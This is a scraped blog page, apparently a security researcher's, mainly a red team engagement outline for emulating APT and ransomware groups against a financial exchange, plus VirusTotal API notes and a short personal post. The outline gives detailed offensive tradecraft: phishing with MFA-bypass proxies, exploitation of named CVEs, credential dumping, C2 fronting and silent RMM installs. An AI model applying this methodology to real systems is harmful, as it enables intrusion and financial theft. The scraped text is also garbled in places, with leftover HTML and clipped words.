SharePoint → OneDrive</td> T1538, T1530</td> Sliver + ROADtools</td></tr> Impact</td> RansomHub/BlackCat deployment; double extortion</td> T1486, T1657</td> Simulated ransomware staging (no encryption executed)</td></tr> </tbody></table> APT 10 — RansomHub (RaaS Affiliate)</h3> Risk Rating: High | Focus: Financial sector volume targeting</strong></p> Emerging in February 2024, RansomHub became the second-most active ransomware group that year, claiming 38 victims in the financial sector between April 2024 and April 2025, with known TTPs including phishing and exploiting public-facing vulnerabilities.</p> Kill Chain:</strong></p> Phase</th> TTP</th> MITRE ID</th> Sliver Emulation</th></tr></thead> Initial Access</td> Fortinet, Citrix, VPN CVE exploitation</td> T1190</td> Metasploit + Sliver beacon on shell</td></tr> Defense Evasion</td> EDRKillShifter — BYOVD to disable EDR</td> T1562.001</td> BYOVD simulation + Sliver evasion flags</td></tr> Lateral Movement</td> RDP pivoting; credential reuse</td> T1021.001</td> Sliver portfwd</code>; NetExec</td></tr> Impact</td> Double extortion: exfil + encryption</td> T1486, T1657</td> Crown jewel access + staged exfil demo</td></tr> </tbody></table> Phase 5 — Attack Execution Methodology</h2> Execution follows NIST SP 800-115 four phases</strong>: Planning → Discovery → Attack → Reporting.</p> 5.1 Reconnaissance</h3> (CSF 2.0: Identify | NIST 800-53: RA-2, RA-3)</em></p> Passive:</strong></p> Shodan</code> / Censys</code> — Exposed services, banners, TLS certificates</li> crt.sh</code> — Certificate Transparency subdomain enumeration</li> theHarvester</code> / FOCA</code> — Employee names, email patterns, document metadata</li> LinkedIn org mapping — High-value personnel, technology stack inference from job postings</li> Dark web monitoring — Access broker listings, existing credential dumps for target domain</li> </ul> Active (within authorized scope):</strong></p> Nmap</code> / Masscan</code> — Service fingerprinting</li> Nuclei</code> — Automated CVE detection; financial-specific templates (Citrix, Fortinet, Exchange, ConnectWise)</li> Aquatone</code> — Visual recon of web attack surface</li> </ul> 5.2 Initial Access Scenarios</h3> Scenario A — Spear Phishing (Lazarus / APT34 / APT35 / MuddyWater emulation)</strong> Craft themed lures: SEC/DORA compliance notices, regulatory update PDFs, spoofed vendor invoices, fake job offers, financial recruiter outreach. Deliver via Gophish</code> with AiTM proxy (Evilginx2</code>). Payload: staged Sliver HTTPS beacon wrapped in Donut</code>/Scarecrow</code> shellcode loader.</p> Scenario B — External Vulnerability Exploitation (RansomHub / APT35 emulation)</strong> Target Citrix NetScaler (CVE-2023-4966), Fortinet (CVE-2023-48788), ConnectWise (CVE-2024-1709), PaperCut (CVE-2023-27350). Deploy Sliver beacon on successful shell.</p> Scenario C — Supply Chain / Third-Party (APT29 / Lazarus / MuddyWater emulation)</strong> Simulate compromise of a trading ISV, clearing system vendor, managed service provider, or IT support firm (replicating MuddyWater's "Rashim" IT provider pattern). Sliver beacon deployed via vendor access credential; pivot into exchange network.</p> Scenario D — Help Desk Social Engineering (Scattered Spider emulation)</strong> Voice vishing targeting IT help desk for MFA device enrollment or password reset. Sliver HTTPS beacon deployed post-takeover.</p> Scenario E — Password Spray / Cloud Identity (APT33 emulation)</strong> Large-scale M365 / Entra ID password spray through TOR exit nodes. On success, deploy Sliver beacon; enumerate cloud tenant via AADInternals</code> and ROADtools</code>.</p> Scenario F — RMM Tool Abuse (MuddyWater emulation)</strong> Deliver phishing email from spoofed or compromised organizational account (bypasses SPF/DKIM). Lure targets CFO/finance executive persona. Payload delivers Sliver beacon alongside silent installation of RMM agent (AteraAgent, NetBird, SimpleHelp). Validate whether EDR detects unauthorized RMM agent enrollment per NYDFS §500.14(b).</p> 5.3 Post-Exploitation & Lateral Movement</h3> (CSF 2.0: Detect/Respond | NIST 800-53: AC-2, AC-6, AU-12, IR-4)</em></p> Technique</th> Tool</th> NIST 800-53 Control Tested</th></tr></thead> AD Enumeration</td> BloodHound CE</code> + SharpHound</code> (via Sliver execute-assembly</code>)</td> AC-2, AC-6</td></tr> Credential Dumping</td> Sliver sideload mimikatz.dll</code>; Nanodump</code> BOF</td> IA-5, SC-28</td></tr> Kerberoasting</td> Rubeus</code> via Sliver execute-assembly</code></td> IA-5, AC-3</td></tr> LSASS Bypass</td> PPLdump</code> via Sliver sideload</code></td> SI-3, SC-39</td></tr> Lateral Movement</td> Sliver psexec</code>, wmiexec</code>, ssh</code>; NetExec</code> (SMB, WMI, MSSQL)</td> SC-7, AC-17</td></tr> Cloud Enumeration</td> AADInternals</code>, ROADtools</code></td> AC-3, IA-8</td></tr> Internal Pivot</td> Sliver portfwd</code>; socks5</code> proxy; wg-portfwd</code> for RDP via WireGuard tunnel</td> SC-7</td></tr> SWIFT Targeting</td> Custom scripts via Sliver tunnel</td> SC-8, SI-4, AU-10</td></tr> Payload Evasion</td> Donut</code>, Scarecrow</code> wrapping Sliver shellcode</td> SI-3, SC-39</td></tr> .NET in-memory</td> Sliver execute-assembly /path/to/Seatbelt.exe -group=all</code></td> SI-3, AU-2</td></tr> </tbody></table> 5.4 Crown Jewel Flags</h3> Objective</th> CSF 2.0 Function</th> Threat Scenario</th></tr></thead> Domain Admin compromise</td> Protect / Detect</td> Ransomware pre-positioning (RansomHub, APT35)</td></tr> Trade OMS access</td> Protect</td> Market manipulation / trade spoofing (APT34, APT29)</td></tr> SWIFT endpoint staging</td> Protect</td> Fraudulent transfer (Lazarus, APT38)</td></tr> Clearing system credential access</td> Protect</td> Settlement disruption (Predatory Sparrow, APT33)</td></tr> PII / trading data exfiltration</td> Respond</td> SEC 8-K materiality trigger; NYDFS 72-hr notification test</td></tr> Cloud tenant admin access</td> Detect</td> M365/Entra ID full takeover (APT29, Scattered Spider)</td></tr> Unauthorized RMM agent enrollment</td> Detect</td> MuddyWater RMM persistence; NYDFS §500.14(b) EDR gap</td></tr> Physical / data center access</td> Protect</td> Insider threat / supply chain (Predatory Sparrow)</td></tr> </tbody></table> Phase 6 — Full Tools & Configuration Reference</h2> Category</th> Tool</th> Configuration Notes</th></tr></thead> C2 Framework</strong></td> Sliver v1.5.42</strong> (BishopFox)</td> Primary C2; HTTPS/mTLS/WireGuard/DNS; per-binary asymmetric keys; multiplayer operator support; opeource; no licensing cost</td></tr> C2 Redirectors</strong></td> Nginx / Apache on separate VPS</td> Proxy to Sliver team server; iptables whitelist only redirector IP on team server</td></tr> CDN / Fronting</strong></td> Cloudflare</td> Front redirectors to avoid JARM fingerprinting and IP-based blocking</td></tr> Phishing</strong></td> Evilginx2 + Gophish</td> AiTM MFA bypass; lure templates for APT35/APT34/Lazarus/MuddyWater profiles</td></tr> Payload Wrapping</strong></td> Donut, Scarecrow</td> AMSI/ETW bypass on Sliver shellcode output</td></tr> AD Reconnaissance</strong></td> BloodHound CE + SharpHound</td> Delivered via Sliver execute-assembly</code>; Tier-0 path identification</td></tr> Credential Ops</strong></td> Mimikatz (via Sliver sideload</code>), Rubeus, Nanodump BOF</td> In-memory only; no disk drops</td></tr> Cloud Ops</strong></td> AADInternals, ROADtools</td> Entra ID / M365 enumeration; OAuth token abuse (APT29 / APT33 profiles)</td></tr> Lateral Movement</strong></td> NetExec, Sliver built-ins</td> SMB/WMI/MSSQL; pass-the-hash</td></tr> Vuln Scanning</strong></td> Nuclei + financial CVE templates</td> Citrix, Fortinet, Exchange, ConnectWise, PaperCut, VPN appliances</td></tr> OSINT</strong></td> Maltego, SpiderFoot, theHarvester, FOCA</td> Passive recon only until written authorization received</td></tr> RMM Simulation</strong></td> AteraAgent, NetBird (controlled install)</td> MuddyWater scenario only; install in authorized scope; document for NYDFS §500.14(b) gap testing</td></tr> Reporting</strong></td> PlexTrac or Dradis</td> CVSS v4.0; NIST 800-53 control mapping; MITRE ATT&CK Navigator JSON export</td></tr> </tbody></table> Tester Certifications:</strong></p> OSCP (Offensive Security Certified Professional)</li> CRTO (Certifie Red Team Operator)</li> GXPN (GIAC Exploit Researcher and Advanced Penetration Tester)</li> CISSP or CISM (engagement leadership / reporting sign-off)</li> </ul> Phase 7 — Historical Reference Reports (2022–2025)</h2> Year</th> Report</th> Key Relevance</th></tr></thead> 2023</td> FS-ISAC "Navigating Cyber 2024"</strong></td> Found that 35% of all DDoS attacks in 2023 targeted financial services; flagged new extortion tactics tied to SEC/DORA disclosure deadlines and quantum computing threats to cryptographic agility.</td></tr> 2023</td> NISA Threat Landscape: Finance (Jan 2023–Jun 2024)**</td> Documented North Korean APTs including Lazarus Group in cryptocurrency theft and ransomware; the FBI linked Lazarus to a $41 million theft from Stake.com in September 2023.</td></tr> 2023</td> ION Group / LockBit Incident (Feb 2023)</strong></td> LockBit's attack on ION disrupted a cleared derivatives trading platform, affecting multiple banks, brokerages, and hedge funds in the US and EU that could not process transactions. Highest-fidelity public template for tradininfrastructure disruption.</td></tr> 2023</td> Clop / MOVEit Supply Chain (Mar–Jul 2023)</strong></td> The Clop ransomware group's exploitation of the MOVEit vulnerability impacted roughly 100 financial companies, establishing the benchmark supply chain scenario for vendor-pivot red team exercises.</td></tr> 2024</td> CISA Advisory AA24-057A — SVR Cloud Tactics</strong></td> Documents APT29/Midnight Blizzard cloud-native TTPs including residential proxy use and exploitation of system accounts in identity infrastructure — directly infoenario C (APT29).</td></tr> 2024</td> CISA / FBI / CNMF / NCSC Advisory AA22-055A — MuddyWater</strong></td> Joint advisory formally attributing MuddyWater to MOIS; documents full TTP baseline including spear-phishing, RMM tool abuse, and open-source tool integration — foundational reference for Scenario F.</td></tr> 2024</td> Flashpoint Financial Threat Actor Report</strong></td> Akira targeted 34 financial organizations; RansomHub claimed 38 financial victims; LockBit claimed access to the US Federal Reserve with alleged exfiltration 3 TB of data; Scattered Spider leveraged SIM swapping extensively.</td></tr> 2024</td> CloudSEK Charming Kitten (APT35) Leak Analysis</strong></td> Credible leak of APT35 operational materials documenting coordinated teams for penetration, malware development, and social engineering, including rapid exploitation of CVE-2024-1709 and mass router DNS manipulation targeting financial sectors in the Middle East, US, and Asia.</td></tr> 2024</td> Check Point BugSleep Analysis (Jul 2024)</strong></td> Full technical breakdown of MuddyWater's BugSleep backdoor, including sleep API sandbox evasion, mutex creation, encrypted C2 configuration, and Egnyte/file-sharing delivery chain — directly informs MuddyWater Scenario F emulation.</td></tr> 2024</td> Zscaler WINELOADER Analysis (Nov 2024)</strong></td> Documented WINELOADER's time-gated C2 communications and memory forensics evasion — the precise behavioral signature this engagement's Sliver long-dwell configuration should emulate in Scenario C (APT29).</td></tr> 2024</td> Deep Instinct DarkBeatC2 Analysis (Apr 2024)</strong> sclosed MuddyWater's DarkBeatC2 framework, including the Registry AutodialDLL sideloading technique and PowerShell-based C2 management — informs Sliver-based DarkBeatC2 emulation.</td> </td></tr> 2025</td> Bybit $1.5B Heist Post-Mortems (Feb 2025)</strong></td> Lazarus deceived exchange executives into authorizing transfer of over 400,000 ETH via a counterfeit wallet management interface — definitive template for transaction authorization layer compromise.</td></tr> 2025</td> Predatory Sparrow — Bank Sepah / Nobitex (Jun 2025)</strong></td> tory Sparrow claimed to have destroyed Bank Sepah's data causing widespread service outages, and the following day stole $90 million from the Nobitex crypto exchange before destroying the funds — establishes the benchmark for destructive state-level financial exchange targeting.</td></tr> 2025</td> Trellix Iranian Cyber Capability 2026 Report</strong></td> Documents APT35's dual-track development of BellaCPP and updated PowerLess backdoor with AMSI/ETW bypass, APT34's dual-channel C2 concealment inside Authorization Bearetokens, and MuddyWater's evolving malware suite (BugSleep, StealthCache, Phoenix, Fooder, MuddyViper, RustyWater) — directly informs Scenarios B, C, and F.</td></tr> 2025</td> Symantec/Carbon Black MuddyWater U.S. Bank Detection (Mar 2025)</strong></td> First confirmed MuddyWater activity on a U.S. bank network; overlap with pre-conflict operational security posture suggesting deliberate preparation — highest-relevance historical data point for U.S. exchange MuddyWater scenario justification.</td></tr> </tbody></table> Phase 8 — Closeporting & Regulatory Deliverables</h2> 8.1 Purple Team Exercise</h3> After covert red team phase concludes:</p> Replay each scenario with SOC observing live</li> Validate SIEM / EDR detection coverage against MITRE ATT&CK Navigator heatmap</li> Identify detection gaps for Sliver-specific signatures (JARM, mTLS port 8888, WireGuard UDP 51820, characteristic certificate chains)</li> Specifically validate RMM agent detection (Atera, SimpleHelp, NetBird) per NYDFS §500.14(b) EDR/SIEM compliance requirements</li> Document resuts for regulatory evidence package</li> </ul> 8.2 Findings Classification</h3> All findings scored using CVSS v4.0</strong> and mapped to NIST 800-53 Rev. 5</strong> control families. Classified as Critical / High / Medium / Low. Critical findings are reviewed by legal counsel for SEC 8-K materiality assessment obligations per the four-business-day disclosure rule.</p> 8.3 Required Deliverables</h3> For Board / Executive Leadership</strong> (CSF 2.0 Govern; SEC Form 10-K Item 106):</p> Executive Summary: business risk narrative, crown jewel findings, regulatory exposure by APT actor</li> NIST CSF 2.0 current vs. target profile heat map</li> Prioritized remediation roadmap</li> </ul> For Technical Teams</strong> (NIST 800-53 CA-8; NYDFS §500.5):</p> Full attack path documentation with screenshots, Sliver session logs, and evidence chains per scenario</li> All TTPs mapped to MITRE ATT&CK Navigator layer (exportable JSON)</li> Sliver-specific detection signatures (JARM fingerprints, mTLS port anomalies, WireGuard UDP/51820 baseline) for SOC integration</li> RMM tool abue detection signatures for MuddyWater-profile gaps</li> </ul> For Compliance / Legal</strong> (NYDFS §500.17; SEC Rule 10; PCI DSS Req. 11.3):</p> NYDFS §500.17(b) compliance attestation documentation</li> Materiality assessment for any simulated finding against SEC 4-day disclosure standard</li> PCI DSS Req. 11.3 pen test completion report (signed by OSCP/GXPN-certified tester)</li> CRI Cyber Profile 2.0 control objective coverage mapping</li> </ul> 8.4 Retention Requirements</h3> All supporting records — including penetration testing rts, access control reviews, and cybersecurity program documentation — must be retained for five years under NYDFS Part 500. Evidence packages should be archived in a tamper-evident, access-controlled repository.</p> Legal Notice:</strong> This engagement outline is for authorized security professionals operating under formal contractual and legal agreements with explicit CFAA authorization. All tools, techniques, and scenarios must be used only within the scope of written authorization against systems owneby or explicitly consented to by the target organization. Engagement personnel must coordinate with qualified legal counsel to ensure compliance with the CFAA, applicable state laws, and SEC materiality obligations prior to commencing any active testing.</p> </blockquote> Virus Total 2026-04-16T00:00:00+00:00 VirusTotal</h2> API documentation</a></p> Official API v3 client libraries:</p> Go</a></li> Python</a></li> </ul> Unofficial API v2 client libraries:</p> Go</a></li> </ul> Public API</h3> base url:</strong> http://www.virustotal.com/vtapi/v2/</code></p> base url:</strong> http://www.virustotal.com/api/v3/</code></p> 500 requests/day at 4 requests/minute</p> Must not be used for commercial products and services, or business workflows which do not contribute new files</p> IPs</h4> https://www.virustotal.com/api/v3/ip_addresses/{ip}</span></span> https://www.virustotal.com/api/v3/ip_addresses/{ip}/comments</span></span> https://www.virustotal.com/api/v3/ip_addresses/{ip}/{relationship}</span></span></code></pre> Example:</p> curl --request GET \</span></span> --url https://www.virustotal.com/api/v3/ip_addresses/23.1.52.26 \</span></span> --header 'accept: application/json' \</span></span> --header 'x-apikey: [api_key]'</span></span></code></pre>Domains</h4> https://www.virustotal.com/api/v3/domains/{domain}</span></span> https://www.virustotal.com/api/v3/domains/{domain}/comments</span></span> https://www.virustotal.com/api/v3/domains/{domain}/{relationship}</span></span> https://www.virustotal.com/api/v3/domains/{domain}/relationships/{relationship}</span></span> https://www.virustotal.com/api/v3/resolutions/{id}</span></span></code></pre>Premium API</h3> VT Hunting</h4> Uses YARA to search VT's dataset using three components: Livehunt</li> Retrohunt</li> VTDIFF</li> </ol> </li> </ul> Livehunt</h5> Compares files submitted to VT with YARA rules in real time</p> Stream of malware files classified by family</li> Discover new malware</li> Filter by given language, specific run-time packer</li> Heuristic rules to detect suspicious files</li> Track threat actors</li> </ul> Retrohunt</h5> Compare historical files with YARA rules, which can take up to 4 hours</p> VTDIFF</h5> Provide a collection of hashes to track and avoid, to create YARA rules with common binary subsequences</p> The Resurrection 2026-04-05T00:00:00+00:00 With an organizational restructure, I am untethered once again. So I'm bringing this back. Though it's been long enough, that everything has been razed and is reborn anew. Very much a work in progress right now; but aren't we all?</p> Yes, we are.</p>

Zerokoan Research

That Overlook Shine

PG: clone

PG: press

Intention

Claude v Finance

Red Team Engagement Outline: Financial Exchange Organization</h1>

U.S. Industrial Standards Alignment | Sliver C2 | Iran / Israel / Russia / DPRK / Cybercriminal APT Coverage</h3>

Phase 1 — Pre-Engagement: Governance & Authorization</h2>

Phase 3 — C2 Infrastructure: Sliver Framework</h2>

Phase 5 — Attack Execution Methodology</h2>
Execution follows NIST SP 800-115 four phases</strong>: Planning → Discovery → Attack → Reporting.</p>

Phase 8 — Closeporting & Regulatory Deliverables</h2>

Virus Total

Premium API</h3>

Retrohunt</h5>
Compare historical files with YARA rules, which can take up to 4 hours</p>

VTDIFF</h5>
Provide a collection of hashes to track and avoid, to create YARA rules with common binary subsequences</p>

The Resurrection